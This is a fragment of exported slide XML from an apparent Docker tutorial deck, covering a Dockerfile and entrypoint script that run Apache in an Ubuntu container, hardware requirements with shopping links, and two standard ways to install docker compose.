              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="135294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo 'Hello from shell script file';</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="135294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="135294"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exec apachectl -D FOREGROUND</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3635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chemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System Requirements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Google Shape;138;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1341325"/>
            <a:ext cx="8520600" cy="330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RAM</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.amazon.in/Kingston-FURY-3200MHz-SODIMM-KF432S20IB/dp/B097TN561M/ref=sr_1_2_sspa?crid=LAKCLSUBS1D7&amp;keywords=kingston+fury+8gb+ddr4+3200&amp;qid=1690599032&amp;sprefix=kingston+fury+16gb+ddr4+3200%2Caps%2C197&amp;sr=8-2-spons&amp;sp_csd=d2lkZ2V0TmFtZT1zcF9hdGY&amp;psc=1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100"/>
              <a:t>SSD</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1600"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.amazon.in/Western-Digital-Internal-500GBfor-Performance/dp/B09ZYPTXS4/ref=sr_1_3?keywords=ssd%2Bwd%2Bblue%2B500gb&amp;qid=1690599227&amp;sprefix=ssd%2Bwb%2Bblue%2Caps%2C206&amp;sr=8-3&amp;th=1</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94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6243" l="7207" r="3919" t="11499"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1366300" y="377849"/>
            <a:ext cx="6897124" cy="4515449"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4465"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4466" name="Google Shape;4466;p724"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739125" y="151875"/>
            <a:ext cx="6621900" cy="992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How to create ubuntu container always up and running from dockerfile?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4467" name="Google Shape;4467;p724"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="220575" y="13651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CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM ubuntu:latest</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000CD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. RUN apt-get update &amp;&amp; apt-get install -y apache2 vim nano</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000CD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. EXPOSE 80	</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000CD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. WORKDIR /root</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000CD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5. COPY entrypoint.sh .</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000CD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6. RUN chmod +x entrypoint.sh</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000CD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7. ENTRYPOINT [“./entrypoint.sh”]</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000CD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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1" name="Shape 4471"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4472" name="Google Shape;4472;p72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820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1st way to install docker compose in ubuntu</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2820">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4473" name="Google Shape;4473;p725"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3832200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-469900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apt install docker-compose -y</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-469900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker-compose version</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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7" name="Shape 4477"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4478" name="Google Shape;4478;p72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820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2nd way to install </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker compose in ubuntu</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2820">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4479" name="Google Shape;4479;p726"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3832200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mkdir -p ~/.docker/cli-plugins/</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>curl -SL https://github.com/docker/compose/releases/download/v2.29.2/docker-compose-linux-x86_64 -o ~/.docker/cli-plugins/docker-compose</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod +x ~/.docker/cli-plugins/docker-compose</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-406400" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker compose version</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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3" name="Shape 4483"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4484" name="Google Shape;4484;p727"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="368825"/>
            <a:ext cx="8520600" cy="5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entrypoint.sh</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4485" name="Google Shape;4485;p727"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692700" y="1041900"/>
            <a:ext cx="7840800" cy="3806700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#!/bin/bash</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xec apachectl -D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FOREGROUND</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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9" name="Shape 4489"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4490" name="Google Shape;4490;p728"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="16184" l="9902" r="13685" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393675" y="477350"/>
            <a:ext cx="6573276" cy="4055451"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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4" name="Shape 4494"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4495" name="Google Shape;4495;p729"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="319500" y="50275"/>
            <a:ext cx="7378558" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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9" name="Shape 4499"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4500" name="Google Shape;4500;p730"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
